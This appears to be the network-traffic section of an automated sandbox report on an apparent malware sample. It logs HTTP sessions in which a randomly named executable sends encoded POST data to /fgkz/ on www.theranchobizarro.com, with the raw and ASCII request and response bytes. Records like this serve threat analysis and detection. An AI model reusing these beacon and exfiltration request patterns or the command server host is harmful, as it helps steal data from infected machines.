                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 6d 77 57 69 62 61 73 4d 50 71 32 6b 4d 51 79 45 62 45 56 72 66 7a 6b 73 41 35 2f 57 6c 51 33 2b 57 35 57 63 36 59 4d 67 63 67 6a 52 62 54 56 64 32 75 70 42 4c 70 63 55 76 78 67 69 72 36 62 4a 59 71 5a 61 33 44 2b 4f 51 4a 2b 68 55 66 49 61 48 48 6d 39 6d 6a 74 42 47 35 46 58 66 70 6e 63 52 56 34 34 71 49 38 37 72 73 70 4f 44 6e 42 5a 66 2f 58 59 31 63 4d 35 2f 78 45 76 45 46 45 31 49 47 65 6f 31 74 34 74 4c 46 37 4c 30 4e 4f 5a 59 76 30 34 32 66 79 38 6e 49 55 45 69 67 31 44 79 4f 78 30 34 6b 36 65 38 35 44 78 68 66 71 55 46 51 3d 3d
                                Data Ascii: 4f2t8=mwWibasMPq2kMQyEbEVrfzksA5/WlQ3+W5Wc6YMgcgjRbTVd2upBLpcUvxgir6bJYqZa3D+OQJ+hUfIaHHm9mjtBG5FXfpncRV44qI87rspODnBZf/XY1cM5/xEvEFE1IGeo1t4tLF7L0NOZYv042fy8nIUEig1DyOx04k6e85DxhfqUFQ==
                                Aug 30, 2024 07:19:05.516459942 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:05 GMT
                                Content-Encoding: gzip
                                Data Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 [TRUNCATED]
                                Data Ascii: aaeZR8ST-c;/C7@XzvKG [nI&~}}=/q,T-U;u;1ShTLuS=rRI2{?r8>J$;5QQMV'.N@Z?{4ul}$5DH]Y=etz|X4#U>t "7,Jbk8**3P,U{uD"AH3R$I8q]MwUK4S4H3`4uxCJ&BPd2sh3kUm|KEqc!8$%GYqi@(&v(+TVyF=E!prAy^m+:(;@RS1aV/obN/prI9U1Qzz/:bSn&]efakP/]lI%|lvB<vSV.aCyG$H;Y|PDqDt:HO)E8cOvKUjyD6"'qIo"V*Jf!@p!+Y=Ka?3T\u;9gR^|&#H~AO+0f/>"NquxUus3"heJK!+_~IDj~E,.iCs,d.eAy!$a3D:'G;_^* |%+ZMR}XpJKyE,-]xB5BhI\! A)]W/s2
                                Aug 30, 2024 07:19:05.516479015 CEST224INData Raw: 35 f5 1c b8 38 3d 1a c2 ab c6 6b 4c c9 44 91 80 c6 c4 81 83 2e bc 6e 36 1b 5b 55 36 26 75 e5 ba a8 7c 4f e7 a9 c5 ba b7 4a cd 45 28 2a aa 3f 88 00 16 85 75 93 b1 ea 01 e6 ea cf 66 d5 e7 d6 4e c3 bb 4c 16 6c ac 96 00 64 da 85 f3 de 87 fe f1 c5 f0
                                Data Ascii: 58=kLD.n6[U6&u|OJE(*?ufNLld=Nq!OO{.Co0{pv?f9[3mq!.q"1i;GBCab^UH.|o)wKi
                                Aug 30, 2024 07:19:05.516499996 CEST1236INData Raw: 78 99 86 d9 a4 53 d9 16 b5 e5 a6 ca 9d 62 09 77 5b 1e 89 c8 ad 88 c9 54 2d 95 f3 7a 56 32 b3 cb 76 7d 7b a7 91 dd 36 b7 5f b5 b6 76 5e bf 6a 6e 2d 6d 80 95 75 29 46 43 5b ed 51 dc c1 b0 5f 2b 67 bf 39 ab 19 76 c2 ae 28 9c f8 a7 a8 a6 24 bf 93 65
                                Data Ascii: xSbw[T-zV2v}{6_v^jn-mu)FC[Q_+g9v($eyu-k[v~jz.+n^O41I|}&O_zP[)Iv[/_.9[?UZD4G%r=k,H}1xjsTdoesC{^sq"'tChWq
                                Aug 30, 2024 07:19:05.516519070 CEST303INData Raw: b4 7c 4d fc d9 5d 4d ce b2 89 3f 4f 13 74 7a a4 ee ea 31 34 c3 7f 9e 16 63 f2 e5 ae 0e 87 dd 7f 3c a8 41 de 07 60 89 2c 10 f7 9f 7f 63 f6 6a 6d df 5b 03 e6 5d 7b 76 e4 58 96 34 9f b7 b1 d6 e5 1c 2c 53 05 92 2a fb 2a c0 bb 57 8b c5 4e bb 8a 4b fb
                                Data Ascii: |M]M?Otz14c<A`,cjm[]{vX4,S**WNK!\,Zbkvk{UN=Y"<<";}/KO9*9V<+wJG}q>%/;,X8>Ix!c^{&i0H3KR& A


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.54972452.9.242.57805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:07.446475029 CEST662OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.theranchobizarro.com
                                Referer: http://www.theranchobizarro.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 6d 77 57 69 62 61 73 4d 50 71 32 6b 4d 77 43 45 5a 6c 56 72 59 54 6b 76 4d 5a 2f 57 75 77 32 35 57 35 61 63 36 61 68 34 63 53 48 52 62 78 39 64 34 4d 42 42 4f 70 63 55 33 42 67 64 6c 61 62 43 59 71 46 38 33 44 79 4f 51 4e 65 68 55 66 59 61 48 51 79 38 6e 7a 74 44 66 70 46 56 62 70 6e 63 52 56 34 34 71 49 70 73 72 74 42 4f 45 55 5a 5a 64 65 58 62 37 38 4d 36 33 52 45 76 4f 6c 45 78 49 47 65 65 31 73 30 48 4c 41 2f 4c 30 4e 2b 5a 59 64 4d 35 34 66 79 2b 71 6f 56 77 74 6b 73 77 35 4d 73 35 2f 55 66 36 72 70 71 7a 70 71 47 48 43 6f 37 4c 66 34 7a 62 48 34 34 48 6b 4c 6e 78 4b 57 4e 31 59 32 45 3d
                                Data Ascii: 4f2t8=mwWibasMPq2kMwCEZlVrYTkvMZ/Wuw25W5ac6ah4cSHRbx9d4MBBOpcU3BgdlabCYqF83DyOQNehUfYaHQy8nztDfpFVbpncRV44qIpsrtBOEUZZdeXb78M63REvOlExIGee1s0HLA/L0N+ZYdM54fy+qoVwtksw5Ms5/Uf6rpqzpqGHCo7Lf4zbH44HkLnxKWN1Y2E=
                                Aug 30, 2024 07:19:08.076946020 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:07 GMT
                                Content-Encoding: gzip
                                Data Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 [TRUNCATED]
                                Data Ascii: aaeZR8ST-c;/C7@XzvKG [nI&~}}=/q,T-U;u;1ShTLuS=rRI2{?r8>J$;5QQMV'.N@Z?{4ul}$5DH]Y=etz|X4#U>t "7,Jbk8**3P,U{uD"AH3R$I8q]MwUK4S4H3`4uxCJ&BPd2sh3kUm|KEqc!8$%GYqi@(&v(+TVyF=E!prAy^m+:(;@RS1aV/obN/prI9U1Qzz/:bSn&]efakP/]lI%|lvB<vSV.aCyG$H;Y|PDqDt:HO)E8cOvKUjyD6"'qIo"V*Jf!@p!+Y=Ka?3T\u;9gR^|&#H~AO+0f/>"NquxUus3"heJK!+_~IDj~E,.iCs,d.eAy!$a3D:'G;_^* |%+ZMR}XpJKyE,-]xB5BhI\! A)]W/s2
                                Aug 30, 2024 07:19:08.076971054 CEST1236INData Raw: 35 f5 1c b8 38 3d 1a c2 ab c6 6b 4c c9 44 91 80 c6 c4 81 83 2e bc 6e 36 1b 5b 55 36 26 75 e5 ba a8 7c 4f e7 a9 c5 ba b7 4a cd 45 28 2a aa 3f 88 00 16 85 75 93 b1 ea 01 e6 ea cf 66 d5 e7 d6 4e c3 bb 4c 16 6c ac 96 00 64 da 85 f3 de 87 fe f1 c5 f0
                                Data Ascii: 58=kLD.n6[U6&u|OJE(*?ufNLld=Nq!OO{.Co0{pv?f9[3mq!.q"1i;GBCab^UH.|o)wKixSbw[
                                Aug 30, 2024 07:19:08.076984882 CEST527INData Raw: 61 31 94 7e 42 ab 85 94 33 1c 35 05 2c a4 e0 8b 94 07 10 0b 0d 23 0a f6 64 89 3d 55 73 9e 41 1e 52 c3 ee 5a 3e 71 8f ef 33 7f 2f 67 af 27 6e f3 38 bc ba ad 3f 5c 42 c1 f8 b2 b6 6f c8 a7 9f cd bb 23 53 4d df 09 78 63 6f c9 1f a8 d9 a3 3a 4d f0 84
                                Data Ascii: a1~B35,#d=UsARZ>q3/g'n8?\Bo#SMxco:MbyoKJ<-.c!LSUfmlVYV[duQDwJSm[vw9\bZQFI@hd|eNG>M<dY3|M]M?Otz1


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.54972552.9.242.57805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:09.985129118 CEST1675OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.theranchobizarro.com
                                Referer: http://www.theranchobizarro.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 6d 77 57 69 62 61 73 4d 50 71 32 6b 4d 77 43 45 5a 6c 56 72 59 54 6b 76 4d 5a 2f 57 75 77 32 35 57 35 61 63 36 61 68 34 63 53 50 52 61 43 46 64 33 4b 4a 42 4e 70 63 55 70 78 67 6d 6c 61 62 66 59 71 4e 67 33 44 76 7a 51 50 6d 68 53 39 67 61 51 31 65 38 70 7a 74 44 43 35 46 59 66 70 6d 55 52 52 55 38 71 49 35 73 72 74 42 4f 45 56 70 5a 5a 50 58 62 32 63 4d 35 2f 78 45 72 45 46 45 5a 49 47 6d 4f 31 73 67 39 4b 7a 48 4c 31 70 61 5a 4c 2b 30 35 77 66 79 34 6d 49 56 6f 74 68 30 76 35 4d 68 4b 2f 56 36 64 72 72 4b 7a 70 66 6a 50 65 73 72 74 46 4b 44 2b 45 38 34 41 6b 4f 4c 45 59 55 74 4c 61 67 47 36 6d 6d 41 51 39 6d 74 4f 63 32 72 63 77 4e 41 52 72 6f 73 70 33 75 46 50 6f 6d 65 33 46 6e 74 4b 56 53 51 2f 78 50 64 4d 45 64 50 58 4a 66 77 6e 5a 33 73 79 77 36 50 4a 75 4f 6c 30 52 2b 72 2b 76 42 78 6a 47 61 4d 41 65 44 52 2f 78 4c 30 70 73 75 67 48 73 62 47 4a 6c 73 68 39 39 38 6d 54 69 36 35 58 67 54 4a 47 45 59 6a 74 4b 50 67 45 34 7a 36 7a 6a 70 42 67 74 43 32 71 37 6a 6e 6d 67 5a 45 39 [TRUNCATED]
                                Data Ascii: 4f2t8=mwWibasMPq2kMwCEZlVrYTkvMZ/Wuw25W5ac6ah4cSPRaCFd3KJBNpcUpxgmlabfYqNg3DvzQPmhS9gaQ1e8pztDC5FYfpmURRU8qI5srtBOEVpZZPXb2cM5/xErEFEZIGmO1sg9KzHL1paZL+05wfy4mIVoth0v5MhK/V6drrKzpfjPesrtFKD+E84AkOLEYUtLagG6mmAQ9mtOc2rcwNARrosp3uFPome3FntKVSQ/xPdMEdPXJfwnZ3syw6PJuOl0R+r+vBxjGaMAeDR/xL0psugHsbGJlsh998mTi65XgTJGEYjtKPgE4z6zjpBgtC2q7jnmgZE95VJ/2IHg1cuImxQMrsL4AVspMDw85LaFo4naWj0MKLCvbBfjdw2pAZHMIiucs4683geLQHxLrqqNqAmiDjJsSMzz8U3JFJkmAJfIsx8uFaKZqycco0ganDvhvSfW1W7ogtI6FMRzhj5fhp0JXRljz+E1K+4fFcudWcU3ktbcamQ18FJbYmlq/oRDpuei74z61vuOeD5lUrxxWTZZDN5KbS00UQpzIPLXZ1/5S5S3jIEpyRzz1jcEMkjkc9YU/98geTQQ+IelcKpaL9CcdkU8XYkwZZlKjIZnrNDunKXhSsjwa3ro2GzVOHuvs8myqNh15TuT2AdKgr+1I03Uo5aWK1AvUm7Y6JSzGAzrxP7NThkKqbpX77vnVulb5ngmFuQuU0U0hu532GRNfv9d5JlXCRan2BDGYMs+213Ok0l4n1eNJytt3uRPpCvAAv5X6wLuvK1v+EgQ5HQuYsrKLwaQnmLmbN6uhFzSM+rDPP69oy+IKim2h+iHgu/p0IhfWp1DvBRIElyHaXobURDHJZy9UMJfzfmVAOAhthh09PU/BqMjfnZqlN/BfR8G9VsHC+ZnOuaaEgWFAXxpCzUfwHNKdAXFbADjrACuVVt+c9a5QzcKyRUdO2pobuqWsIFG7HBtYDuRr4dboXiFCLPcLs7TG7JgTK2qF/BlmD [TRUNCATED]
                                Aug 30, 2024 07:19:10.579782009 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:10 GMT
                                Content-Encoding: gzip
                                Data Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 [TRUNCATED]
                                Data Ascii: aaeZR8ST-c;/C7@XzvKG [nI&~}}=/q,T-U;u;1ShTLuS=rRI2{?r8>J$;5QQMV'.N@Z?{4ul}$5DH]Y=etz|X4#U>t "7,Jbk8**3P,U{uD"AH3R$I8q]MwUK4S4H3`4uxCJ&BPd2sh3kUm|KEqc!8$%GYqi@(&v(+TVyF=E!prAy^m+:(;@RS1aV/obN/prI9U1Qzz/:bSn&]efakP/]lI%|lvB<vSV.aCyG$H;Y|PDqDt:HO)E8cOvKUjyD6"'qIo"V*Jf!@p!+Y=Ka?3T\u;9gR^|&#H~AO+0f/>"NquxUus3"heJK!+_~IDj~E,.iCs,d.eAy!$a3D:'G;_^* |%+ZMR}XpJKyE,-]xB5BhI\! A)]W/s2
                                Aug 30, 2024 07:19:10.579798937 CEST1236INData Raw: 35 f5 1c b8 38 3d 1a c2 ab c6 6b 4c c9 44 91 80 c6 c4 81 83 2e bc 6e 36 1b 5b 55 36 26 75 e5 ba a8 7c 4f e7 a9 c5 ba b7 4a cd 45 28 2a aa 3f 88 00 16 85 75 93 b1 ea 01 e6 ea cf 66 d5 e7 d6 4e c3 bb 4c 16 6c ac 96 00 64 da 85 f3 de 87 fe f1 c5 f0
                                Data Ascii: 58=kLD.n6[U6&u|OJE(*?ufNLld=Nq!OO{.Co0{pv?f9[3mq!.q"1i;GBCab^UH.|o)wKixSbw[
                                Aug 30, 2024 07:19:10.579813004 CEST448INData Raw: 61 31 94 7e 42 ab 85 94 33 1c 35 05 2c a4 e0 8b 94 07 10 0b 0d 23 0a f6 64 89 3d 55 73 9e 41 1e 52 c3 ee 5a 3e 71 8f ef 33 7f 2f 67 af 27 6e f3 38 bc ba ad 3f 5c 42 c1 f8 b2 b6 6f c8 a7 9f cd bb 23 53 4d df 09 78 63 6f c9 1f a8 d9 a3 3a 4d f0 84
                                Data Ascii: a1~B35,#d=UsARZ>q3/g'n8?\Bo#SMxco:MbyoKJ<-.c!LSUfmlVYV[duQDwJSm[vw9\bZQFI@hd|eNG>M<dY3|M]M?Otz1
                                Aug 30, 2024 07:19:10.579905987 CEST79INData Raw: a7 c4 33 4b 07 03 aa 0d 52 d5 1c 26 9c dc ce b8 20 41 de 59 64 ef a1 66 09 25 f6 7f 10 e4 ed c6 b3 cc ad 1a 9a c6 d8 b4 85 95 9b 25 1b a1 f2 2d e2 ee 8d d1 a7 9e bd 50 31 6f 58 cc ff 6c f8 2f b8 f2 eb 56 cd 21 00 00 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 3KR& AYdf%%-P1oXl/V!0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.54972652.9.242.57805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:12.515137911 CEST354OUTGET /fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:13.142031908 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:13 GMT
                                Data Raw: 31 66 37 30 0d 0a 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 4c 69 73 74 69 6e 67 5a 65 6e 20 56 65 72 73 69 6f 6e 3a 20 34 2e 32 2e 32 0a 20 20 41 75 74 68 6f 72 3a 20 41 72 74 75 72 20 47 72 69 67 69 6f 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 [TRUNCATED]
                                Data Ascii: 1f70...================================================================================ ListingZen Version: 4.2.2 Author: Artur Grigio================================================================================ --><!DOCTYPE html><html><head lang="en"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="msapplication-tap-highlight" content="no"> <title>Real Estate Property Web Site, MLS Tour, Photography, Video</title><meta name="description" content="Built for agents and photographers, marketers, and other vendors to meet up and create property sites. We provide Photography, Floor Plan, Videography, SEO..."><meta name="keywords" content="real, estate, property, photography, marketing, real estate, zillow, websites, agent, agency, photographer"><meta name="pin
                                Aug 30, 2024 07:19:13.142117977 CEST224INData Raw: 74 65 72 65 73 74 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 75 6b 2e 70 69 6e 74 65 72 65 73 74 2e 63 6f 6d 2f 6c 69 73 74 69 6e 67 7a 65 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c
                                Data Ascii: terest" content="https://uk.pinterest.com/listingzen"> <meta property="og:title" content="Real Estate Property Web Site, MLS Tour, Photography, Video" /><meta property="og:description" content="Built for agents and phot
                                Aug 30, 2024 07:19:13.142363071 CEST1236INData Raw: 6f 67 72 61 70 68 65 72 73 2c 20 6d 61 72 6b 65 74 65 72 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 76 65 6e 64 6f 72 73 20 74 6f 20 6d 65 65 74 20 75 70 20 61 6e 64 20 63 72 65 61 74 65 20 70 72 6f 70 65 72 74 79 20 73 69 74 65 73 2e 20 57 65 20 70
                                Data Ascii: ographers, marketers, and other vendors to meet up and create property sites. We provide Photography, Floor Plan, Videography, SEO..." /><meta property="og:url" content="1" /><meta property="og:site_name" content="ListingZen" /> <meta n
                                Aug 30, 2024 07:19:13.142474890 CEST1236INData Raw: 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 0a 20 20 20 20 20 20 20 20 22 40 74 79 70 65 22 3a 20 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 38 37 20 4e 2e 20 52 61 79 6d
                                Data Ascii: ttp://schema.org", "@type": "Organization", "address": "87 N. Raymond Ave., UNIT 809, Pasadena, CA 91103", "url": "https://www.listingzen.com/", "logo": "http://www.theranchobizarro.com/img/site/dark_logo_250.jp
                                Aug 30, 2024 07:19:13.142488956 CEST1236INData Raw: 65 61 53 65 72 76 65 64 22 3a 20 22 55 53 22 0a 20 20 20 20 20 20 20 20 7d 5d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 54 72 61 63 6b 69 6e 67 20 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e
                                Data Ascii: eaServed": "US" }] } </script> ... Tracking --> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.get
                                Aug 30, 2024 07:19:13.142501116 CEST1236INData Raw: 2d 64 6f 77 6e 22 3e 20 3c 6c 69 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 72 61 6e 63 68 6f 62 69 7a 61 72 72 6f 2e 63 6f 6d 2f 6d 61 72 6b 65 74 70 6c 61 63 65 22 20 63 6c 61 73 73 3d 22 75 70 70 65 72 63 61 73
                                Data Ascii: -down"> <li> <a href="http://www.theranchobizarro.com/marketplace" class="uppercase light-text-main">Marketplace</a> </li> <li> <a href="http://www.theranchobizarro.com/pricing#pricing" class="uppercase light-text-main">Pricing</a> </li> <li>
                                Aug 30, 2024 07:19:13.142513037 CEST896INData Raw: 6e 3c 2f 61 3e 20 3c 2f 6c 69 3e 20 3c 6c 69 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 72 61 6e 63 68 6f 62 69 7a 61 72 72 6f 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 22 20 63 6c 61 73 73 3d 22 75 70 70 65 72 63 61
                                Data Ascii: n</a> </li> <li> <a href="http://www.theranchobizarro.com/register" class="uppercase waves-effect waves-block waves-light center-align">Sign Up</a> </li> </ul> ... END HEADER --> ... START MAIN --> <div id="main" style="paddin
                                Aug 30, 2024 07:19:13.142533064 CEST1236INData Raw: 73 73 3d 22 66 6f 6f 74 65 72 2d 63 6f 70 79 72 69 67 68 74 20 72 6f 77 20 6e 6f 2d 6d 61 72 67 69 6e 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 2d 74 65 78 74 2d 73 65 63 6f 6e 64 61 72 79 20 63 65 6e 74 65 72 20 63 6f 6c 20 73
                                Data Ascii: ss="footer-copyright row no-margin"> <div class="light-text-secondary center col s12"> <span class="left hide-on-small-only"><a href="http://www.theranchobizarro.com/sitemap.xml" target="_blank">Sitemap</a></span> <span class="left hide-on-sma
